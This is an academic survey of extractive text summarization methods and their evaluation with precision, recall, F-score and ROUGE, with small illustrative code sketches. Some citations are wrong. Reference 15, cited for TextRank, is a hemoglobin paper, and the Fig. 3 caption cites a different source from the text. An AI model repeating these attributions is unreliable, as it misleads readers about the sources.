adequate training summaries are available.

Keywords Text summarization · Extractive summarization · Abstractive


summarization · Precision · Recall · F-score · Deep learning

1 Introduction

In today’s world, Internet users are increasing exponentially day by day. So large
amounts of information and documents, in digital form, are available online. It is
not an easy job to quickly and summarily find the corresponding information and

S. Dhankhar (B) · M. K. Gupta


Department of Computer Science and Engineering, Swami Keshvanad Institute of Technology,
Management & Gramothan, Jaipur 302017, India
e-mail: sunil@skit.ac.in


Fig. 1 Categorization
factors of text summarization

documents according to users' interests. However, producing manual summaries of such large documents on time is a very complex and time-consuming task. Automatic text summarization is a mechanism that produces summaries of large documents in less time.
Research on text summarization started in 1958, when [1] successfully generated abstracts of technical papers and magazine articles using a word-frequency statistical method. Since then, researchers have used different techniques to produce a summary from text documents that represents the whole document [2, 3]. According to [4], a summary is a short text created from one or more texts that includes a substantial part of the source text(s) and is not more than half of the original text(s).
Automatic text summarization is the way of creating a concise and coherent
summary while preserving the central and overall sense of the source text(s) [2].
According to [5], various factors are used to categorize the automatic text summarization process: input, purpose, and output (see Fig. 1). The input factor can further be classified as single document, multidocument, monolin-
gual, multilingual, and cross-lingual. In the single document, only one document is
used as input to produce a summary while, on the other hand, in the multidocument,
more than one document is used as input to produce a summary. These multiple
input documents are often from the same theme. The monolingual automatic text

summarization system generates summaries in the same language as the input language, while multilingual systems use documents in different languages and generate the summaries in one of the input document languages. In cross-lingual systems, the input document(s) language and the summary language are not the same.
A summary may be categorized as generic, domain-specific, and query-based
according to the purpose factor. Generic summaries do not concern any particular class, subject, or domain; they are for general use and contain all the information present in the documents, while domain-specific summaries refer to a particular area of interest. In contrast, query-based systems produce summaries on the basis of a user query. Based
on the output factor, text summarization can be classified as extractive and abstrac-
tive. Extractive summaries are produced by selecting important words, phrases, and
sentences from the source document(s) while abstractive summaries are human-like
summaries that contain words, phrases, and sentences not featured in the source
document(s). In other words, advanced natural language processing techniques are
required to generate abstractive summaries [6].
Extractive summaries are easier to generate because the source document(s) ensure baseline levels of grammaticality and accuracy. On the other hand, abstractive summaries are hard to generate because they require paraphrasing, generalization, and real-world knowledge. This paper focuses on the features, techniques and methods, and evaluation of extractive text summarization.
The paper is arranged as follows: Sect. 2 describes extractive summarization.
Section 3 illustrates the various features of text summarization systems. Section 4
describes the different methods proposed in the literature for extractive text summa-
rization. Section 5 compares the different methods that we have presented in Sect. 4.
Section 6 introduces the various performance matrices for evaluating methods for
extractive text summarization, and Sect. 7 concludes the paper and presents future
guidance for the study into extractive text summarization research.

2 Extractive Text Summarization

As previously mentioned, extractive summarization techniques generate summaries by selecting a subset of sentences or phrases from the text(s). The summary produced includes the most significant phrases from a single document or multiple documents. Figure 2 shows the steps of
nificant phrases from a single or multiple documents. Figure 2 shows the steps of
extractive summarization that are preprocessing, processing, and post-processing. In
the preprocessing step, unstructured data is changed into the structured data using
segmentation, stopword removal, stemming, lemmatization, and tokenization. The
second step consists of a representation of text, scoring of sentences, and extraction
of highest scored sentences. Sections 3 and 4 define different features, methods, and
techniques that are used for the text processing, and in the last step, the summary
is generated by reordering the sentences and replacing the words with their actual
values.

Fig. 2 Steps in extractive text summarization process

3 Features for Extractive Text Summarization

Features can be categorized as word level and sentence level [7]. Word-level features score each word, sentence-level features score each sentence, and the highest-scoring sentences are then extracted to produce a summary [8]. Table 1 lists different features that have been used by researchers in recent times.

4 Methods for Extractive Text Summarization

This section addresses the different techniques and methods of extractive text summarization used over time by different researchers to increase the quality of the summary. We describe and briefly illustrate each of these methods in the rest of this section.

4.1 Statistical-Based

This method uses some statistical techniques to identify important sentences or words
in a document(s). These techniques assign the weights to sentences or words without
considering the meaning or relation of sentences or words. Some statistical techniques
are word probability [1, 9], TF-IDF [7, 10, 11], title word [12, 13], proper-noun
[12, 13], thematic word [12], keywords [13, 14], numerical data [12, 13], sentence
position [7, 12], and sentence length [7, 12].

Table 1 Feature classification


Features Classification Description
Word probability [1, 9] Word-Level Each word occurring in the document(s) is
counted. A word’s probability can be defined as
the number of counts divided by all the words in
the document(s).
TF-IDF [7, 10, 11] Word-level The significance of the word is determined by
multiplying its TF and IDF values of that word.
Title-word [12, 13] Word-level Sentences containing the title words are more
important to other sentences because that
sentence reflects the document theme and is
considered to be the most important in a
summary.
Proper-Noun [12, 13] Word-level Sentences with proper names such as a person’s
name, location, and idea are highly likely to be
part of the summary.
Thematic word [12] Word-level Thematic words are a list of the most important
domain keywords in the document(s). The
summary should include a sentence with a
maximum number of such words.
Content word [13, 14] Word-level Keywords are generally nouns and identified by
TF-IDF.
Numerical data [12, 13] Word-level Sentences with numerical details are considered
relevant and should be summarized.
Sentence position [7, 12] Sentence-level A sentence’s location is an important element in
assessing the value of the sentence. The initial
sentences in records are always important and
can be outlined instead of the last sentences.
Sentence length [7, 12] Sentence-level Long sentences contain more and relevant
information as compared to the short sentences.
So short sentences are ignored.

The biggest disadvantage of this method is that it may generate a low-quality


summary because it does not consider the meaning of sentences or words.
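As an illustration of this statistical scoring, the sketch below ranks sentences by the sum of the TF-IDF weights of their words using scikit-learn; the tokenization settings and the summary length are assumptions, not prescriptions from the surveyed papers.

```python
from sklearn.feature_extraction.text import TfidfVectorizer

def tfidf_summary(sentences, n=3):
    """Score each sentence by its total TF-IDF weight and keep the top n."""
    tfidf = TfidfVectorizer(stop_words="english")
    matrix = tfidf.fit_transform(sentences)            # sentence-by-term matrix
    scores = matrix.sum(axis=1).A.ravel()              # one score per sentence
    top = sorted(range(len(sentences)), key=lambda i: scores[i], reverse=True)[:n]
    return [sentences[i] for i in sorted(top)]         # keep original sentence order

# summary = tfidf_summary(list_of_sentences, n=3)
```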

4.2 Graph-Based

Graph-based sentence ranking methods are among the most important approaches and have attracted the attention of many researchers in this area. Words or phrases are represented in graphs as nodes, with edges connecting the words or sentences that are semantically related. Two essential graph-based techniques that provide promising results for sentence ranking are TextRank [15] and LexRank [16]. Both represent the sentences of the document as vertices in a weighted undirected graph, then draw the edges

between sentence pairs based on the similarity between them. Using the PageRank [17] algorithm on the graph, significant sentences are chosen by the system using a random walk on the graph.
GRAPHSUM, a general-purpose summarizer based on a graph model, discovers multiword similarities by looking at association rules [18]. Alzuhair and Al-Dhelaan [19] developed an improved weighting scheme by combining several measures to determine the similarity of two sentences, namely the Jaccard similarity coefficient, TF-IDF, cosine, and topic-signature similarity, and then applied the PageRank algorithm to the resulting similarity measure.
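A compact sketch of this graph-based idea in the spirit of TextRank/LexRank: sentences become nodes, edges are weighted by the cosine similarity of their TF-IDF vectors, and PageRank ranks them. It is an illustration, not a reimplementation of any of the cited systems.

```python
import networkx as nx
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

def graph_rank_summary(sentences, n=3):
    """Rank sentences with PageRank over a cosine-similarity graph."""
    tfidf = TfidfVectorizer(stop_words="english").fit_transform(sentences)
    sim = cosine_similarity(tfidf)                 # pairwise sentence similarity
    graph = nx.from_numpy_array(sim)               # weighted, undirected sentence graph
    scores = nx.pagerank(graph, weight="weight")   # random-walk centrality
    top = sorted(scores, key=scores.get, reverse=True)[:n]
    return [sentences[i] for i in sorted(top)]

# summary = graph_rank_summary(list_of_sentences, n=3)
```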

4.3 Semantic-Based

Semantic-based methods identify the relationship between sentences and words by


latent semantic analysis (LSA) technique. LSA is a method that derives semantics
dependent on words observed [20]. Gong and Liu [21] defines the LSA technique to
select highly ranked sentences from document(s) as follows.
First, construct the sentence matrix S = [s1, s2, ..., sn], where each column is the weighted term-frequency vector of a sentence in the text. If the document contains a total of m terms and n sentences, the document is represented by an m × n matrix S. Since not all terms normally appear in every sentence, the matrix S is typically sparse. Given the m × n matrix S, the singular value decomposition (SVD) of S, without loss of generality, is defined as:
S = U E V^T    (1)
 
where U = [uij] is an m × n column-orthogonal matrix whose columns are called the left singular vectors; E is the n × n diagonal matrix with non-negative singular values sorted in descending order; and V = [vij] is an n × n orthogonal matrix whose columns are called the right singular vectors.
John et al. [22] proposed an automated multidocument summarization approach for extractive, feature-based methods, considering semantic aspects with the LSA and non-negative matrix factorization (NMF) techniques. The sentence rating steps for any LSA summary can be divided into two parts: first, construct the term-by-sentence matrix for the input, and second, apply the SVD technique on the input matrix to determine the correlation between terms and sentences [23]. The key downside of the semantic approach used by the LSA technique is that the connection between combinations across several documents and the basic concepts is not considered [24]. To overcome this drawback, [24] proposed the Enhanced LSA (ELSA)-based summarizer for multiple documents, which correlates recurrent sets of words with the underlying document concepts.
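Following the two-step LSA procedure sketched above, the snippet below builds the term-by-sentence matrix, applies the SVD of Eq. (1), and picks, for each leading singular vector, the sentence with the largest component (in the style of Gong and Liu); it is a simplified sketch rather than the ELSA variant.

```python
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer

def lsa_summary(sentences, n=3):
    """Select one sentence per leading latent topic."""
    # m x n term-by-sentence matrix S (terms as rows, sentences as columns).
    s = CountVectorizer(stop_words="english").fit_transform(sentences).T.toarray()
    u, e, vt = np.linalg.svd(s, full_matrices=False)   # S = U E V^T
    chosen = []
    for k in range(min(n, vt.shape[0])):
        # Right singular vector k gives each sentence's weight on latent topic k.
        idx = int(np.argmax(np.abs(vt[k])))
        if idx not in chosen:
            chosen.append(idx)
    return [sentences[i] for i in sorted(chosen)]

# summary = lsa_summary(list_of_sentences, n=3)
```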

4.4 Fuzzy-Based

Fuzzy logic is a multi-valued logic that is characterized by a membership function and is an extension of Boolean logic; it was introduced to describe intermediate values between the two discrete values 1 and 0. The advantage of fuzzy logic is its consistency with the real world, which is not a world of two values [25]. Khosravi et al.
[26] used a fuzzy logic system with multiple features to produce a summary. Esther
Hannah and Geetha [27] successfully generates summary using fuzzy inference sys-
tem with different features that we have discussed in Sect. 3. Malallah and Ali [28]
proposed ATS for multidocuments that use linguistic and statistical features of sen-
tences. The extracted features are fed into a fuzzy logic system, and then the apriori algorithm is used for association rule extraction.
The latest research using fuzzy logic to automatically produce summaries is from Goularte [29]; it relies on fuzzy rules to locate the most relevant information in the texts analyzed. This method summarizes the text by analyzing the relevant features to decrease dimensionality. The method can also benefit the development and use of potential expert systems for automatically assessing writing, with the proposed text summarization technique using relatively few fuzzy rules.
The most recent research using fuzzy-based methods is done by [7]. There are four main components in a fuzzy logic system. The first component is the fuzzifier, which uses membership functions to translate features into linguistic values; the fuzzy inference engine is the second component, which formulates outputs based on the membership functions and fuzzy rules; thirdly, human intelligence is employed in designing the if-then rules; and lastly, defuzzification converts the linguistic inference results back into a crisp output. Van Lierde et al. [30] proposed a new query-oriented summarization system with a fuzzy hypergraph model where nodes represent sentences and topics are represented by fuzzy hyperedges. In this method, sentences are evaluated by their significance to the query and their central role in the hypergraph.
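To make the fuzzifier/inference/defuzzifier pipeline concrete, here is a deliberately tiny pure-NumPy sketch with triangular membership functions, two hand-written rules, and two assumed features (a normalized TF-IDF score and sentence position); real systems such as those cited use many more features and rules.

```python
import numpy as np

def tri(x, a, b, c):
    """Triangular membership function peaking at b."""
    return float(np.maximum(np.minimum((x - a) / (b - a + 1e-12),
                                       (c - x) / (c - b + 1e-12)), 0.0))

def fuzzy_sentence_score(tfidf, position):
    """tfidf and position are normalized to [0, 1]; returns a crisp importance score."""
    # Fuzzification: linguistic values for each feature.
    tfidf_high = tri(tfidf, 0.4, 1.0, 1.6)
    pos_early = tri(position, -0.6, 0.0, 0.6)
    # Inference (Mamdani-style: min for AND, complement for NOT):
    important = min(tfidf_high, pos_early)         # IF tfidf high AND position early
    unimportant = 1.0 - max(tfidf_high, pos_early) # IF tfidf low AND position late
    # Defuzzification: weighted average (important -> 1, unimportant -> 0).
    return important / (important + unimportant + 1e-12)

# print(fuzzy_sentence_score(tfidf=0.8, position=0.1))
```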

4.5 Machine Learning-Based

With these methods, the summarization problem is treated as a supervised sentence classification problem, given a set of documents and their related summaries [31]. Each document's sentences are modeled as vectors of text-derived features. During a training cycle, the machine learns from examples in which every sentence of the training documents is labeled "summary" or "non-summary". The unseen documents are sent to the trained model after a successful learning phase, which then classifies their sentences as summary or non-summary.
Conroy and O’leary [32] successfully generated sentence abstract summaries of
documents using hidden Markov models (HMM). [31] used Naive Bayes and C4.5
decision tree algorithms for the classification task. Shen et al. [33] suggested a novel

document summary method based on the conditional random field (CRF) where
the summarization problem is described as a sequence labeling problem. Support vector regression (SVR) has been applied to query-focused multidocument summarization with a number of specified features to locate the relevant sentences in the documents to be summarized [34]. Fattah [35] proposed a multidocument hybrid machine learning model with
maximum entropy (ME), Naive Bayes, and support vector machine (SVM) classifiers. The SVM classifier aims to find the optimum hyperplane between the classes "Summary" and "Non-Summary" using its kernel function, which is defined in Eq. (2):

K(x_i, x_j) = tanh(γ · x_i^T x_j + r)   (2)

where γ and r are the kernel parameters, with γ set to 1.
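As a small illustration of Eq. 2 (not the authors' code), the sigmoid kernel can be evaluated directly with NumPy; the feature vectors and the value r = 0 below are assumptions for the example only, since the paper does not state r.

```python
# Sketch of the sigmoid (hyperbolic tangent) kernel of Eq. 2.
import numpy as np

def sigmoid_kernel(x_i, x_j, gamma=1.0, r=0.0):
    # K(x_i, x_j) = tanh(gamma * x_i^T x_j + r)
    return np.tanh(gamma * np.dot(x_i, x_j) + r)

x_i = np.array([0.2, 0.7, 0.1])   # hypothetical sentence features (position, TF-IDF, length)
x_j = np.array([0.3, 0.5, 0.4])
print(sigmoid_kernel(x_i, x_j, gamma=1.0, r=0.0))
```

In practice the same kernel is available, for example, through scikit-learn's SVC with kernel="sigmoid", where gamma and coef0 play the roles of γ and r.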


The latest research using machine learning methods is done by [36], which proposed a novel multidocument extractive summarization approach consisting of a two-stage procedure to complete the summarization task. The first step constructs a single document from several documents with the help of coverage and non-redundancy features. In the second step, the text summarization problem is treated as an optimization problem in which the summary sentences are selected so as to optimize the scoring functions.
The most recent study using machine learning methods uses K-means clustering with TF-IDF to produce the summary [37]. K-means clustering is an unsupervised machine learning algorithm that assigns the N weighted sentences of a text to k clusters using TF-IDF techniques, where the value of k is user-defined.
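A rough sketch of this TF-IDF + K-means idea is given below; it is not the implementation of [37], and the strategy of picking the sentence closest to each cluster centre, as well as the toy sentences, are assumptions for illustration.

```python
# Weight sentences with TF-IDF, cluster them into k groups,
# and pick the sentence nearest each cluster centre as the summary.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.feature_extraction.text import TfidfVectorizer

def kmeans_summary(sentences, k=2):
    tfidf = TfidfVectorizer().fit_transform(sentences)          # sentence-term matrix
    km = KMeans(n_clusters=k, n_init=10, random_state=0).fit(tfidf)
    summary_ids = []
    for c in range(k):
        members = np.where(km.labels_ == c)[0]
        # distance of each member sentence to its cluster centre
        dists = np.linalg.norm(tfidf[members].toarray() - km.cluster_centers_[c], axis=1)
        summary_ids.append(members[np.argmin(dists)])
    return [sentences[i] for i in sorted(summary_ids)]          # keep original order

sentences = ["The cat sat on the mat.", "Dogs are loyal animals.",
             "Cats often sleep all day.", "A dog guards the house."]
print(kmeans_summary(sentences, k=2))
```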

4.6 Deep Learning-Based

Methods based on neural networks (NN) have recently become popular for extractive summarization. Deep neural networks model and process information with several nonlinear neural network layers. Deep learning networks must have a huge amount of training data to learn powerful and semantically useful representations; for example, convolutional neural networks (CNN) and recurrent neural networks (RNN), like most deep learning approaches, need labeled data to fit the millions of learning parameters in a deep neural architecture.
Kågebäck et al. [38] use continuous vector representations to represent the sentences of a multidocument collection for extractive summarization; the continuous vectors are based on a recursive autoencoder and are evaluated on a standard dataset using the ROUGE measures. Kim [39] trains a simple CNN with one convolution layer on top of word vectors obtained from an unsupervised neural language model. Yin and Pei [40] applied a CNN to represent the sentences in a continuous vector space and then select sentences from the multidocument collection by minimizing a cost based on "prestige" and "diversity". Zhong et al. [41] present another related study that solves the query-oriented multidocument summarization problem by using an unsupervised deep learning model called query-oriented deep extraction (QODE). The QODE model has three elements: extraction, generation of the summary, and validation of the reconstruction. Finally, the most appropriate sentences are selected using dynamic programming to create a summary.
Cheng and Lapata [43] develop a deep neural network-based hierarchical document encoder and an attention-based content extractor for single-document extractive summarization. Sentence representations are obtained using a single-layer CNN with a max-over-time pooling operation and are then used as inputs to a standard RNN that acquires document-level representations hierarchically. The highest-scoring sentences are selected using a long short-term memory (LSTM) decoder.
Yousefi-Azar and Hamey [44] implemented an unsupervised deep neural network that produces a query-based summary for a single document. Using a deep autoencoder (AE), they learn features from the term frequencies and apply small random noise to the local term frequencies used as the AE input; they propose such a noisy AE ensemble, the Ensemble Noisy Auto-Encoder (ENAE), which increases average recall by 11.2%. Nallapati et al. [45] present SummaRuNNer, a two-layer bidirectional GRU-RNN sequence model that treats extractive text summarization as sequential classification: every sentence is visited sequentially in the original order, and a judgment is made as to whether or not it should be used in the summary. Yao et al. [46] present a reinforcement learning framework for extractive document summarization that uses a hierarchical CNN/RNN network architecture not only to generate detailed features but also to create a collection of likely text actions for a Deep Q-Network (DQN). At the same time, the DQN learns which sentence should be picked by approximating the Q-value function based on content, salience, and redundancy.
The latest research using deep learning methods is done by [42], which proposed SummCoder, a generalized unsupervised deep learning framework for extractive text summarization of a single document. The sentence score is based on the importance of the sentence content, the sentence novelty, and the sentence location in the document. The summary is obtained by choosing the top-scoring sentences, restricted by the default summary length.
The most recent research using deep learning-based methods is done by [47], which proposed two NN-based approaches for the summarization of Indian legal judgment documents. In the first approach, a single unit, which is a feed-forward NN (FFNN), is made of an input layer, two hidden layers, and one output layer; the architecture of the NN is shown in Fig. 3. The second approach uses a recurrent LSTM-based NN that contains memory blocks known as LSTM cells, where one LSTM cell consists of four interacting neural network layers.
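A hypothetical sketch of an FFNN of this shape (input layer, two hidden layers, one output layer scoring each sentence) is shown below; the layer sizes, the number of input features, and the sigmoid output are illustrative assumptions, not the configuration used in [47].

```python
# Minimal feed-forward sentence scorer in PyTorch (illustrative only).
import torch
import torch.nn as nn

class SentenceFFNN(nn.Module):
    def __init__(self, n_features=10, hidden=32):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(n_features, hidden),  # input layer -> hidden layer 1
            nn.ReLU(),
            nn.Linear(hidden, hidden),      # hidden layer 2
            nn.ReLU(),
            nn.Linear(hidden, 1),           # output layer: summary-worthiness score
            nn.Sigmoid(),
        )

    def forward(self, x):
        return self.net(x)

model = SentenceFFNN()
features = torch.rand(4, 10)        # 4 sentences, 10 hand-crafted features each
print(model(features).squeeze(1))   # probability of each sentence being a summary sentence
```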

5 Comparison of Methods for Extractive Text


Summarization

This section compares the various extractive text summarization approaches mentioned in the above sections. We compare them based on the co-selection evaluation performance metrics, namely precision, recall, and F-score. Table 2 provides a detailed comparison and also illustrates the advantages and limitations of these methods.

Fig. 3 FFNN architecture [42]

6 Evaluation Metrics

The evaluation of an automatically generated summary for a document(s) is a very difficult task because the evaluation criteria for a quality summary are not clearly defined. Since the late 1990s, many evaluation conferences have been started in the USA [5]. Some of them are "SUMMAC (1996–1998)" [48], "The Document Understanding Conference (DUC, 2000–2007)" [49] and, most recently, the Text Analysis Conference (TAC, 2008–present). The primary purpose of these conferences was to encourage state-of-the-art text summarization techniques through shared evaluation results. The present performance criteria are classified into extrinsic and intrinsic evaluation [50]. Extrinsic evaluation assesses the quality of the automatic summary based on how it helps other tasks such as text classification, information retrieval, or question answering.

6.1 Intrinsic Evaluation

Two types of evaluation metrics are used, based on text quality and content evaluation. In text quality evaluation, the main parameters used to measure the quality of the text are: it must be grammatically correct, contain no repeated sentences (non-redundancy), have reference clarity, and the summary must contain coherent sentences and have some structure.
Table 2 Comparison and evaluation of different methods ("–" means not defined)

| Method name | Advantages | Limitations | Reference No. | Precision | Recall | F-score |
|---|---|---|---|---|---|---|
| Statistical-based | Easy to implement | Lack of uniformity in summary, and important sentences may not be included in the summary | [1, 9–11] | – | – | – |
| Graph-based | It offers a greater interpretation of critical sentences | Sentences in graphs are represented by a bag of words with similarity measures that cannot recognize semantically identical sentences | [16] | – | 0.087 | – |
| | | | [18] | 0.099 | 0.093 | 0.097 |
| | | | [19] | – | – | – |
| Semantic-based | Semantically related sentences will be generated by this method | This approach uses a time-consuming SVD methodology, and the summary generated depends on the consistency of the semantic representation of the source text | [22] | 0.554 | 0.542 | 0.548 |
| | | | [23] | – | 0.05 | – |
| | | | [24] | – | 0.86 | – |
| Fuzzy-based | A fuzzy method is similar to the real world, which is not a world of two values (0 or 1) | There can be an issue of repetition among the chosen sentences in the summary, which affects summary accuracy; a redundancy reduction technique is therefore required to enhance the accuracy of the final summary | [27] | 0.4734 | 0.4918 | 0.4824 |
| | | | [7] | 0.073 | 0.155 | 0.099 |
| | | | [28] | 0.473 | 0.463 | 0.466 |
| | | | [29] | 0.366 | 0.496 | 0.421 |
| Machine learning-based | A basic machine learning approach can yield better results than other methods | This requires an extensive training collection of manually generated extractive summaries in which each sentence is marked as either a "summary" or a "non-summary" sentence | [33] | – | 0.419 | – |
| | | | [32] | – | 0.535 | – |
| | | | [34] | – | 0.0757 | – |
| | | | [35] | – | 0.382 | – |
| | | | [36] | 0.234 | 0.096 | 0.136 |
| Deep learning-based | The model based on deep learning can learn in the manner of a reader | This approach uses neural networks, which are slow during training and testing, and it is difficult to explain how the network makes a decision | [38] | 0.199 | 0.204 | 0.194 |
| | | | [41] | – | 0.092 | – |
| | | | [40] | – | 0.269 | 0.107 |
| | | | [45] | – | 0.231 | – |
| | | | [43] | – | 0.83 | – |
| | | | [44] | 0.167 | 0.229 | 0.188 |
| | | | [46] | – | 0.141 | – |
| | | | [42] | – | 0.717 | – |
| | | | [47] | 0.217 | 0.283 | 0.245 |

6.2 Content Evaluation

Intrinsic evaluations are further classified into two categories according to content evaluation: co-selection and content-based evaluation. Recall, precision, and F-score are the metrics used for co-selection [51]. Let S_A represent the set of sentences in the automated summary, while S_G represents the set of sentences in the gold summary. Precision (P), recall (R), and F-score (F) can be expressed by the following equations:

P = |S_A ∩ S_G| / |S_A|   (3)

R = |S_A ∩ S_G| / |S_G|   (4)

F = (2 · P · R) / (P + R)   (5)
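A small sketch of these co-selection metrics is shown below; the sentence index sets are hypothetical and serve only to illustrate Eqs. 3–5.

```python
# Precision, recall, and F-score over sets of selected sentence indices (Eqs. 3-5).
def co_selection_scores(auto_ids, gold_ids):
    auto, gold = set(auto_ids), set(gold_ids)
    overlap = len(auto & gold)
    p = overlap / len(auto) if auto else 0.0
    r = overlap / len(gold) if gold else 0.0
    f = 2 * p * r / (p + r) if p + r else 0.0
    return p, r, f

print(co_selection_scores(auto_ids=[0, 2, 5, 7], gold_ids=[0, 3, 5]))  # -> (0.5, 0.667, 0.571)
```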

The biggest issue with precision and recall is that two perfectly good automatically generated summaries can receive very different evaluations. Saggion et al. [52] proposed content-based evaluation methods that compare similarities among summaries using cosine similarity, unit overlap based on unigrams or bi-grams, and the longest common subsequence (LCS). The biggest disadvantage of these methods is the degree to which the results correlate with human judgment.
"Recall-Oriented Understudy for Gisting Evaluation (ROUGE)" [51] is also a content-based evaluation method that uses n-gram matching to automatically compare system-generated summaries with human-generated summaries. ROUGE contains many packages for evaluating system-generated summaries, but here we discuss only those commonly used by researchers (a small illustrative sketch follows this list):
• ROUGE-N: In this case, N refers to the N-gram length. It is a recall-oriented measure based on N-gram (mostly bi-gram and tri-gram) comparison. To calculate the score, we take N consecutive words from the system-generated and gold summaries, find the total number of matching N-grams between them, and lastly divide by the number of N-grams in the gold summary. The drawback of this strategy is that N consecutive words are required for a match.
• ROUGE-L: L stands for LCS. Unlike ROUGE-N, it automatically identifies the longest in-sequence word match, at the sentence level, between the system-generated and the gold summaries. The final score is calculated by summing all the sentence-level LCS scores. The longer the LCS of two summaries, the more similar the two summaries are. There are two advantages of this measure: (1) it does not require consecutive word matches, and (2) no predefined N-gram length is required. The disadvantage of this measure is that it does not consider the shorter sequences in the final score.
• ROUGE-SU: SU stands for skip bi-gram and unigram. It counts skip bi-grams formed by two words with arbitrary distance in the sentence order. If the distance is very large, it produces misleading bi-gram matches; therefore, a maximum skip distance of 4 is typically used, i.e., ROUGE-SU4.
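The sketch below illustrates the idea behind ROUGE-N (bigram recall) and ROUGE-L (LCS-based recall). It is not the official ROUGE package, and for brevity it ignores the multiplicity clipping that the real implementation performs; the example sentences are made up.

```python
# Simplified ROUGE-N (bigram recall) and ROUGE-L (LCS recall).
def ngrams(tokens, n):
    return [tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

def rouge_n_recall(system, gold, n=2):
    sys_ngrams, gold_ngrams = ngrams(system, n), ngrams(gold, n)
    matches = sum(1 for g in gold_ngrams if g in sys_ngrams)
    return matches / len(gold_ngrams) if gold_ngrams else 0.0

def lcs_length(a, b):
    # classic dynamic-programming longest common subsequence, as used by ROUGE-L
    table = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i, x in enumerate(a, 1):
        for j, y in enumerate(b, 1):
            table[i][j] = table[i - 1][j - 1] + 1 if x == y else max(table[i - 1][j], table[i][j - 1])
    return table[len(a)][len(b)]

gold = "the cat sat on the mat".split()
system = "the cat lay on the mat".split()
print(rouge_n_recall(system, gold, n=2))        # bigram recall: 0.6
print(lcs_length(system, gold) / len(gold))     # ROUGE-L recall: ~0.83
```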
The biggest disadvantage of the ROUGE evaluation methods is that people may disagree on the gold summaries because these summaries may be biased. However, ROUGE is widely used by researchers for the evaluation of automatically generated summaries.

7 Conclusion

Text summarization is an important research subject because manual summarization is time-intensive and costly given the vast volume of text on the Internet. We concentrate on extractive summarization because it does not require much linguistic knowledge, and we have listed the different features used by different researchers in recent times. The most used features are sentence position, sentence length, and the TF-IDF feature. By comparing different methods of text summarization, we conclude that deep learning methods outperform the others if enough training data are available. Future research in text summarization includes improving widely used features, finding features that are compatible with one another, and producing grammatically accurate summaries.

References

1. Luhn, H. P. (1958). The automatic creation of literature abstracts. IBM Journal of Research and Development, 2(2), 159–165.
2. Allahyari, M., Pouriyeh, S., Assefi,M., Safaei, S., Elizabeth, D., Juan, B., & Kochut, K. (2017).
Text summarization techniques: A brief survey. International Journal of Advanced Computer
Science and Applications, 8(10).
3. Yogan J. K., Goh, O. S., Basiron, H., Choon, N. K., & Suppiah, P. C. (2016). A review on
automatic text summarization approaches. Journal of Computer Science, 12(4), 178–190.
4. Magdum, P. G., & Rathi, S. (2021). A survey on deep learning-based automatic text summa-
rization models. In Advances in Artificial Intelligence and Data Engineering (pp. 377–392).
Springer.
5. Saggion, H., & Poibeau, T. (2013). Automatic text summarization: Past, present and future. In
Multi-source, multilingual information extraction and summarization (pp. 3–21). Springer.
6. See, A., Liu, P. J., & Manning, C. D. (2017). Get to the point: Summarization with pointer-
generator networks. arXiv preprint arXiv:1704.04368.
7. Patel, D., Shah, S., & Chhinkaniwala, H. (2019). Fuzzy logic based multi document summa-
rization with improved sentence scoring and redundancy removal technique. Expert Systems
with Applications, 134, 167–177.
8. Wang, S., Zhao, X., Li, B., Ge, B., & Tang, D. (2017). Integrating extractive and abstrac-
tive models for long text summarization. In 2017 IEEE International Congress on Big Data
(BigData Congress) (pp. 305–312). IEEE.
9. Vanderwende, L., Suzuki, H., Brockett, C., & Nenkova, A. (2007). Beyond SumBasic: Task-
focused summarization with sentence simplification and lexical expansion. Information Pro-
cessing and Management, 43(6), 1606–1618.

10. Güran, A., Uysal, M., Ekinci, Y., & Güran, C. B. (2017). An additive FAHP based sentence
score function for text summarization. Information Technology and Control, 46(1), 53–69.
11. Mori, H., Yamanishi, R., & Nishihara, Y. (2018). Detection of words accepted to dynamic
abstracts focusing on local variation of word frequency. Procedia Computer Science, 126,
1442–1449.
12. Abbasi-ghalehtaki, R., Khotanlou, H., & Esmaeilpour, M. (2016). Fuzzy evolutionary cellular
learning automata model for text summarization. Swarm and Evolutionary Computation, 30,
11–26.
13. Gambhir, M., & Gupta, V. (2017). Recent automatic text summarization techniques: A survey.
Artificial Intelligence Review, 47(1), 1–66.
14. Gupta, V., & Kaur, N. (2016). A novel hybrid text summarization system for Punjabi text.
Cognitive Computation, 8(2), 261–277.
15. Taketa, F. (1973). Structure of the felidae hemoglobins and response to 2, 3-diphosphoglycerate.
Comparative Biochemistry and Physiology Part B: Comparative Biochemistry, 45(4), 813–823.
16. Radev, D. R., & Erkan, G. (2004). LexRank : Graph-based centrality as salience in text sum-
marization. Journal of Artificial Intelligence Research, 22(1), 457–479.
17. Brin, S., & Page, L. (1998). The anatomy of a large-scale hypertextual Web search engine
BT—Computer networks and ISDN systems. Computer Networks and ISDN Systems, 30(1–
7), 107–117.
18. Baralis, E., Cagliero, L., Mahoto, N., & Fiori, A. (2013). GraphSum: Discovering correlations
among multiple terms for graph-based summarization. Information Sciences, 249, 96–109.
19. Alzuhair, A., & Al-Dhelaan, M. (2019). An approach for combining multiple weighting
schemes and ranking methods in graph-based multi-document summarization. IEEE Access,
7, 120375–120386.
20. Deerwester, S., Harshman, R., Susan, T., George, W., & Thomas, K. (1990). Indexing by latent
semantic analysis. Journal Of THe American Society For Information Science, 41(6), 391–407.
21. Gong, Y., & Liu, X. (2001). Generic text summarization using relevance measure and latent
semantic analysis. In Proceedings of the 24th annual international ACM SIGIR conference on
research and development in IR (pp. 19–25).
22. John, A., Premjith, P. S., & Wilscy, M. (2017). Extractive multi-document summarization using
population-based multicriteria optimization. Expert Systems with Applications, 86, 385–397.
23. Al-Sabahi, K., Zhang, Z., Long, J., & Alwesabi, K. (2018). An enhanced latent semantic analy-
sis approach for Arabic document summarization. Arabian Journal for Science and Engineer-
ing, 43(12), 8079–8094.
24. Cagliero, L., Garza, P., & Baralis, E. (2019). ELSA: A multilingual document summariza-
tion algorithm based on frequent itemsets and latent semantic analysis. ACM Transactions on
Information Systems, 37(2), 1–33.
25. Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 8(3), 338–353.
26. Khosravi,H., Eslami, E., Kyoomarsi, F., & Dehkordy, P. K. (2008). Optimizing text summa-
rization based on fuzzy logic. In Computer and Information Science (pp. 121–130). Springer.
